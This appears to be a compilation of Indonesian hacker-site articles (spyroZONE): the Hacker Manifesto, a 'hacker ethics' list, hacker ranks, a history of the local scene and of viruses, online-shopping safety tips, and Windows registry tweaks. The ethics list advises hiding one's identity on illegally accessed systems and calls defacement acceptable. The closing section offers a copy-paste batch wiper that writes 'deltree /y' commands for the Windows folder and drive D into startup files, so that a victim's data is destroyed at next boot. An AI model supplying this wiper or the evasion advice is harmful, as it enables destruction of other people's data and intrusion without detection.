This is our world now.. the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat and lie to us and try to make us belive it is for our own good, yet we're the ciminals.


Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.
I am a Hacker, and this is my manifesto. You can't stop me, and you certainly can't stop us all.





------------------------

Etika Hacker

------------------------



* Akses ke komputer-komputer - dan segala sesuatu yang berpotensi untuk mengajarmu mengenai dunia ini haruslah bebas dan total. Semua informasi haruslah tersedia secara bebas / cuma-cuma.

* Jangan percaya otoriter/kemapanan - dukung desentralisasi.

* Hackers haruslah dinilai berdasarkan kemampuan hackingnya - bukannya berdasar kriteria seperti derajat, umur, ras, atau posisi. Anda bisa berkarya seni dan keindahan melalui komputer. Komputer dapat merubah hidupmu menuju kelebih baikan.

Sedangkan dalam prakteknya, Etika Hacker diatas (prinsip) dipraktekkan dengan mengikuti kode etik:

* Jangan merusak sistem manapun secara sengaja. (rmrf hard disk, crash, overflow, dll. Mengubah tampilan index.html sebuah website sah-sah saja asalkan file aslinya disimpan di sistem yang sama dan bisa diakses oleh administrator.)

* Jangan mengubah file-file sistem selain yang diperlukan untuk mengamankan identitas anda.

* Jangan meninggalkan nama asli anda (maupun orang lain), handle asli, maupun nomor telepon asli di sistem apapun yang anda akses secara ilegal. Mereka bisa dan akan melacak anda dari handle anda.

* Berhati-hatilah dalam berbagi informasi sensitif. Pemerintah akan menjadi semakin pintar. Secara umum, jika anda tidak mengenal siapa sebenarnya lawan bicara/chatmu, berhati-hatilah!

* Jangan memulai dengan mentargetkan komputer-komputer milik pemerintah. Ya, ada banyak sistem milik pemerintah yang cukup aman untuk di-hack, namun resikonya lebih besar dari keuntungannya. Ingat, pemerintah punya dana yang tak terbatas dibanding dengan ISP/Perusahaan yang objektifnya adalah untuk mencari profit..





--------------------------------------

Tingkatan-tingkatan Dalam Dunia Hacker

--------------------------------------



Elite :

Juga dikenal sebagai 3l33t, 3l337, 31337 atau kombinasi dari itu; merupakan ujung tombak industri keamanan jaringan. Mereka mengerti sistemoperasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global. Sanggup melakukan pemrogramman setiap harinya. Sebuah anugrah yang sangat alami, mereka biasanya effisien & trampil,menggunakan pengetahuannya dengan tepat. Mereka seperti siluman dapat memasuki sistem tanpa di ketahui, walaupun mereka tidak akan menghancurkan data-data. Karena mereka selalu mengikuti peraturan yang ada.



Semi Elite:

Hacker ini biasanya lebih mudadaripada Elite.Mereka juga mempunyai kemampuan & pengetahuan luas tentang komputer. Mereka mengerti tentang sistem operasi (termasuk lubangnya). Biasanya dilengkapi dengan sejumlah kecilprogram cukup untuk mengubah program eksploit. Banyak serangan yang dipublikasi dilakukan oleh Hacker kaliber ini, sialnya oleh para Elite mereka sering kali di kategorikan Lamer.



Developed Kiddie:

Sebutan ini terutamakarena umur kelompok ini masih muda (ABG)&masih sekolah. Mereka membaca tentang metoda hacking & caranya di berbagai kesempatan. Mereka mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya.Umumnya mereka masih menggunakan Grafik UserInterface (GUI) & baru belajar basic dari UNIX, tanpa mampu menemukan lubang kelemahan baru di sistem operasi.



Script Kiddie:

Seperti developed kiddie, Script Kiddie biasanya melakukan aktifitas di atas. Seperti juga Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal. Biasanya tidak lepas dari GUI. Hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.



Lamer:

Mereka adalah orang tanpa pengalaman & pengetahuan yang ingin menjadi Hacker (wanna-be Hacker). Mereka biasanya membaca atau mendengar tentang Hacker & ingin seperti itu. Penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit. Biasanya melakukan hacking menggunakan software trojan, nuke & DoS. Biasanya menyombongkan diri melalui IRC channel dsb. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.





----------------------------------

Hacking Scene di indonesia.
----------------------------------


Pada era 80-an hingga 1994, lahirlah para Hacker Indonesia yang boleh dibilang masih "ASLI". Pada umumnya mereka lahir secara otodidak dan secara kebetulan memiliki akses jaringan. Biasanya terdiri dari para pegawai perusahaan-perusahaan besar atau instansi-instansi pemerintah. Mereka ini terdiri dari orang-orang yang berkecimpung di bidang UNIX, VAX/VMS, dan tentu saja ahli jaringan.


Ketika Internet mulai marak di Indonesia, mulailah masyarakat begitu antusias mempelajari komputer terutama network security. Jika dulunya tidak ada aktivitas yang bersifat merusak, kini perlahan hal itu mulai berubah. Remaja-remaja ABG mulai "berterbangan" di Internet, mencari tutorial-tutorial baru, mencari pengetahuan-pengetahuan komputer yang tidak mereka dapatkan di sekolah. Mereka menjadi semakin pintar, bahkan melebihi guru-guru di sekolah mereka.

Namun layaknya seorang ABG, sebagian besar dari mereka jiwanya masih labil. Pengetahuan mereka masih sangat minim dan memiliki semangat tinggi untuk merusak. Mereka masih belum mengerti arti "Hack" yang sebenarnya. Mereka dengan sombong dan tidak tau malu menyebut diri mereka Hacker hanya karena berhasil mengakali Billing, menjalankan email BOMB, menjalankan exploit-exploit. Padahal mereka sama sekali tidak tau bagaimana tool yang mereka gunakan itu sendiri bekerja. Mereka tidak mengenal sang system, namun dengan sombong mereka menyebut dirinya Hacker. Tanpa tau apa itu TCP/IP, namun dengan banga menyebut dirinya Hacker. Padahal para Hacker sejati Indonesia yang kemampuannya sudah setara dengan para wizard di Amerika dengan tegas menolak dirinya disebut Hacker lantaran masih selalu merasa ilmu yang dimilikinya belum cukup. Yeah, inilah Hacking Scene (pangung perhackingan) di Indonesia yang cukup menyedihkan ^_^ namun bisa juga diangap wajar dan manusiawi :)



Akan tetapi tidak semua dari mereka yang hanya bermulut besar. Tentu saja pasti ada diantaranya yang benar-benar memiliki kemampuan walaupun jumlahnya sedikit. Mereka yang sedikit ini kemudian banyak yang mengadakan pertemuan-pertemuan baik secara sengaja maupun tidak sengaja. Mereka tetap berexplorasi dan mencari pengetahuan, beraktivitas seperti biasa di lingkungannya tanpa menimbulkan kecurigaan atau prasangka dari masyarakat sekitarnya.



Dari pertemuan-pertemuan yang dilakukan, mulailah bermunculan organisasi-organisasi Hacker dan Cracker. Diantaranya yang cukup ternama ialah: AntiHackerlink (sudah tidak kedengaran lagi keberadaannya), Crack Sky (biasa juga dikenal sebagai Cracker Society, sebuah organisasi Underground yang berpusat di Surabaya), Kecoak Elektronik, ECHO, Jasakom Community, IndoHack, Secreet Colony, dan masih banyak lagi. Pada umumnya setiap daerah memiliki organisasi-organisasi sendiri dan nama organisasi disesuaikan dengan daerah asal mereka. Misalnya untuk komunitas Hacker Batam biasa menyebut dirinya Batam Hacker, untuk daerah malang biasa menyebut dirinya MalangHackerlink, dan lain sebagainya.



Aktivitas-aktivitas yang kini mereka lakukan cukup beragam. Pada umumnya ialah memoderasi forum-forum dan milis besar, menjadi OP di IRC-IRC Channel ternama, saling berbagi pengetahuan dengan menulis tutorial-tutorial, Artikel, Advisories seputar bugs-bugs baru beserta cara pencegahannya, mengadakan seminar-seminar tentang Network Security, menulis program open-source, serta melakukan berbagai aktivitas "Hack" sebagai sarana pemenuhan kebutuhan untuk berexplorasi.



Pada umumnya para Hacker peka terhadap keadaan lingkungannya. Anggapan bahwa mereka adalah orang-orang yang individualis dan egois tampaknya harus segera dihapuskan. Hal ini telah lama terbukti, anda bisa menyaksikan sendiri bagaimana pertarungan para Hacker Indonesia dengan Hacker-Hacker Malaysia saat negara itu ingin merampas Ambalat dari Indonesia. Atau perseteruan Hacker Indonesia melawan Hacker-Hacker dari Australia saat mereka mengusik Indonesia. Inilah cara berbeda para Hacker dalam mempertahankan negaranya, bukan dengan senjata, bukan dengan kekerasan, namun dengan ilmu pengetahuan.

Enter spyroZONE! - www.spyrozone.net

Tips Aman Belanja Online

(Dari Komisi Perdagangan Amerika)



Komisi perdagangan Amerika (FTC) telah mempublikasikan tips bagi konsumen yang berbelanja online :

- Carilah kebijakan privacy situs tersebut. Perusahaan tersebut harus memberitahukan konsumen informasi apa yang dikumpulkan, bagaimana menggunakannya dan apakah akan menjual atau memberikan informasi tersebut kepada yang lain.

- Simpanlah informasi pribadi anda. Hanya diberikan bila anda tahu siapa yang mengumpulkannya, mengapa dan bagaimana akan digunakan.

- Rahasiakan password anda.

- Bayarlah dengan credit card. Jika anda tidak mendapatkan barangnya, jangan bayar tagihan credit card tersebut.

- Periksalah kebijakan pengiriman dan pengembalian perusahaan tersebut.

- Yakinkan bahwa transaksi pada situs tersebut aman (secure) sebelum anda melakukan pembelian



Better Bussiness Bureaus (www.bbb.org) adalah organisasi non profit yang melayani kepentingan masyarakat dengan mempromosikan praktek bisnis yang etis dalam perdagangan. Mereka menerbitkan tips bagi belanja online :

- Jika anda melakukan surfing di internet, anda mungkin akan merasa akrab dengan istilah toko digital (digital stores) dan mall online (online malls). Ribuan konsumen sekarang menggunakan kemudahan untuk berbelanja di rumah sendiri melalui komputer. Anda dapat membeli apa saja, baju, komputer, CD, anda tinggal menyebutkan !! Mall yang penuh sesak, antrian panjang dan susah mendapatkan parkir akan menjadi kenangan. Kelihatannya hebat? Memang ya !!



.:: Biro usaha yang lebih baik (BBB) bersama - sama dengan Komisi Perdagangan Federal (FTC), memberikan tips berikut ini untuk memastikan bahwa pengalaman belanja online anda akan memuaskan.

- Jika anda tertarik untuk mencoba pedagang yang baru, yang mana anda tidak kenal, tanyalah pedagang tersebut lokasi fisiknya (Alamat dan No. Telepon) sehingga anda bisa memeriksa reabilitasnya pada organisasi luar seperti BBB atau yayasan perlindungan konsumen lainnya.

- Periksalah kebijaksanaan perusahaan terhadap pengembalian uang dan barang sebelum anda melakukan barang.

- Jangan pernah memberikan password anda. Ketika membuat password, hindarkan penggunaan nomor yang sudah ada seperti nomor rumah anda, tanggal lahir atau No. Telepon atau No. KTP. Jika situs tersebut meminta anda membuat suatu rekening dengan password, jangan gunakan password yang sama untuk rekening atau situs yang lain.

- Berhati - hatilah bila diminta memberikan informasi pribadi, seperti No. KTP atau No. Rekening bank pribadi anda utk melakukan transaksi. Informasi pribadi jarang diperlukan dan seharusnya anda mawas diri.

- Periksa perusahaan tersebut dengan Biro Usaha yang lebih baik di kota anda. Untuk No.Telepon atau alamat dari BBB terdekat anda, kunjungi situs BBB pada http://www.bbb.org. Kantor BBB di Boston dan kota New York menyediakan laporan realibitas bisnis secara online.

- Berikan perhatian pada "Alamat" dari situs - Uniform Resource Locator (URL) nya. URL tsb memastikan anda berhubungan dengan perusahaan yang sebenarnya. Merupakan kebiasaan yang baik untuk mencetak order anda dan nomor konfirmasinya ke printer sebagai catatan anda.

- Ketahuilah hak - hak anda. Hukum yang melindungi anda bila anda berbelanja menggunakan telepon atau mail order juga akan melindungi anda bila berbelanja di Internet. Menurut peraturan tersebut, perusahaan harus mengirimkan order anda dalam waktu yang sama dengan waktu yang tertera di iklan. Jika tidak ada waktu yang dijanjikan, perusahaan harus mengirimkan order anda dalam waktu 30 hari setelah menerimanya atau memberikan anda suatu 'pemberitahuan pilihan'

- Jika anda memutuskan untuk membayar menggunakan kartu kredit atau kartu debet, transaksi anda akan dilindungi oleh Fair Credit Billing Act (Hukum Penagihan Kredit yang fair), jika anda tidak merasa nyaman untuk memberikan No. Kartu Kredit atau Kartu Debet secara online. Kirimlah nomor tersebut melalui telepon atau fax perusahaan tersebut.

- Untuk mendapatkan nasehat tambahan atau tips lainnya agar dapat melakukan pembelian yang bijaksana online maupun offline, kunjungi situs BBB (www.bbb.org) & situs FTC (www.ftv.gov).

Enter spyroZONE! - www.spyrozone.net

Sejarah Perkembangan Virus

Virus yang pertama kali muncul di dunia ini bernama [Elk Cloner] lahir kira-kira tahun 1981 di TEXAS A&M. Menyebar melalui disket Apple II yang ada operating systemnya. Sang perusak ini mendisplay pesan di layar : "It will get on all your disks-It will infiltrate your chips–yes it is Cloner!-It will stick to you like glue-It will modify RAM too-send in the Cloner!" Hi……………….



Nama "Virus" itu sendiiri baru diberkan setelah 2 tahun kelahirannya oleh Len Adleman pada 3 November 1983 dalam sebuah seminar yang ngebahas cara membuat virus and memproteksi diri dari virus. Tapi orang-orangorang sering menganggap bahwa virus yang pertama kali muncul adalah virus [Brain] yang justru lahir tahun 1986. Wajar aja, soalnya virus ini yang paling menggemparkan dan paling meluas penyebarannya karean menjalar melalui disket DOS yang waktu itu lagi ngetrend. Lahirnya juga bersamaan dengan [PC-Write Trojan] dan [Vindent]



Mulai saat itu, `virus mulai menguasai dunia. Perkembangannya mengerikan dan sangar banget ! berselang satu tahun muncul virus pertama yang menginfeksi file. Biasanya yang diserang adalah file yang berekstensi *.exe Virus ini bernama [suriv] termasuk dalam golongan virus "jerussalem". Kecepatan penyebarannya cukup 'menggetarkan hati' untuk saat itu. Tapi virus ini ngga' terlalu jahat ko' soalnya virus ini menghantam dan menghajar mainframe-nya IBM ngga' lama-lama, cuma setahun (eh setahun itu lama apa sebentar ya…?)

Tahun 1988, muncul serangan BESAR terhadap Machintosh oleh virus [MacMag] dan [scores] dan jaringan Internet dihajar habis-habisan oleh virus buatan Robert Morris. Tahun 1989 ada orang iseng yang ngirim file "AIDS information program" dan celakanya, begitu file ini dibuka, yang didapat bukannya info tentang AIDS, tapi virus yang mengenskrypsi harddisk dan meminta bayaran untuk kode pembukanya (hehehe…….. ada-ada aja cara orang nyari duit)



Sejak saat itu, penyebaran virus udah ngga' keitung lagi. Akan tetapi dampak yang ditimbulkan ngga' terlalu besar. Baru tahun 1995 muncul serangan besar-besaran. Ngga' tanggung-tanggung, mereka nyerang perusahaan-perusahaan besar diantaranya Griffith Air Force Base, Korean Atomic Research Institute, NASA, IBM dan masih banyak PERUSAHAAN RAKSASA lain yang dianiaya oleh "INETRNET LIBERATION FRONT" di hari ~Thanksgiving~. Karena keberanian dan kedahsyatan serangan itu, tahun 1995 dijuluki sebagai tahunnya para Hacker dan Cracker.



Para Cracker memang tidak pernah puas. Setiap muncul sistem operasi atau program baru, mereka sudah siap dengan virus barunya. Kamu yang sering ngetik dengan MS Word mungkin pernah nemuin virus Titassic. Ini virus local asli Indonesia lho… and uniknya, virus ini ngingetin kita buat sholat tepat pada waktunya (waduh, alim juga ya..) Tapi jangan salah, virus macro yang punya judul [concept]ini juga bisa berhati jahat, sangar and ganas banget. Soalnya si alim yang jahat ini bakalan ngemusnahin 80% file-file data and program korbannya.



Nah, seiring dengan perkembangan teknologi, muncul virus pertama yang mengkombinasi virus macro dan worm. Namanya cukup manis [Melissa]. Tapi ngga' semanis namanya, virus ini bakalan menyebar ke orang lain lewat E-Mail and yang paling menyakitkan, ia bakalan nyebar ke semua alamat E-Mail yang ada di address book-mu. Dan saat ini muncul jutaan virus yang bergentayangan ngga' karuan di alam Internet.

Enter spyroZONE! - www.spyrozone.net

Mengubah Text Tombol Start Menjadi Lebih Dari Lima Huruf

Selama ini, kita hanya bisa merubah tulisan pada tombol [Start] selama tidak lebih dari lima huruf baik melalui MS-Dos atau Registry. Nah, bagaimana kalau kita ingin agar tulisan [Start] tersebut menjadi [Komputerku] atau [PcPribadiku] atau seperti yang anda inginkan?? Kita harus memodifikasi file explorer.exe yang terletak di C:\Windows.



Karena file ini adalah file Binary, kita butuh sebuah program editor. Jika belum punya editor file Binary, anda bisa download "Resource Hacker" yang salah satu fungsinya adalah memodifikasi file Binary di Http://www.users.on.net/johnson/resourcehacker atau download di situs ini pada halaman Utility. Setelah dapat programnya, kita akan mulai beraksi, berikut ini panduannya:



Langkah 1

Lakukan backup file explorer.exe yang terletak di direktori C:\Windows lalu jalankan "Resource Hacker" kemudian buka [explorer.exe]



Langkah 2

Pilih [String Table]lalu klik ganda [37], klik sekali pada [1033]. Nah, sekarang pada item 578 terdapat tulisan "start" yang merupakan kata pada tombol [Start]. Ganti kata "start" tersebut sesuai keinginan anda, tetapi pastikan anda tidak menggunakan spasi dan tanda kutip tidak hilang.



Langkah 3

Simpan dengan nama exploler[nama].exe di direktori C:\Windows\. Misalnya saja nama yang tadi anda gunakan merubah kata "start" adalah "Komputerku", maka anda harus menyimpan file ini dengan nama explolerkomputerku.exe



Langkah 4

Sekarang keluar dari "Resource Hacker" karena kita akan memodifikasi Registry. Klik [Start] lalu [Run] ketikkan Regedit dan tekan [enter]. Masuklah ke HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WindowsNT\ CurrentVersion\Winlogon.



Cari string bernama shell klik ganda dan rubah value data-nya dengan nama yang tadi anda simpan. Klik [Ok] dan restart PC anda. Dan tombol [Start] anda sudah berubah sesuai yang anda inginkan.

Enter spyroZONE! - www.spyrozone.net

Menyembunyikan Recycle Bin

1. Open your Registry Editor.

2. Jump to the following location:

HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Desktop/NameSpace

3. Rename the following key:

{645FF040-5081-101B-9F08-00AA002F954E}

[rename]--->

{645FF040-5081-101B-9F08-00AA002F954E-HIDDEN}

4. Close your Registry Editor and then refresh your desktop. Yuppy... can you see your Recycle Bin now?? :P

Enter spyroZONE! - www.spyrozone.net

Program Perusak

Ini khusus buat para "Lamer sejati" yang pengin ngerusak kompynya orang. Kalo kamu ngerasa bukan lamer, segera tinggalin artikel ini!!



Okay, ngga' usah banyak omong, lansung aja copy-pastekan code sialan di bawah ini ke teks editor kamu dan simpan dengan ekstensi .bat:



@echo off

echo deltree /y %windir%\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

echo deltree /y d:\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

atau

@echo off

echo deltree /y %windir%\*.*>> AUTOEXEC.BAT

echo deltree /y d:\*.*>> AUTOEXEC.BAT



wELL, ga' perlu dijelasin pasti udah pada ngerti donk. Yup, kalo udah disimpan (misalnya LAMER.BAT) lansung eksekusi dan shutdown komputernya trus kabur dech hihihi... program perusak kamu bakalan bekerja dengan sendirinya begitu si korban nyalain komputernya lagi.

Author : SPYRO KiD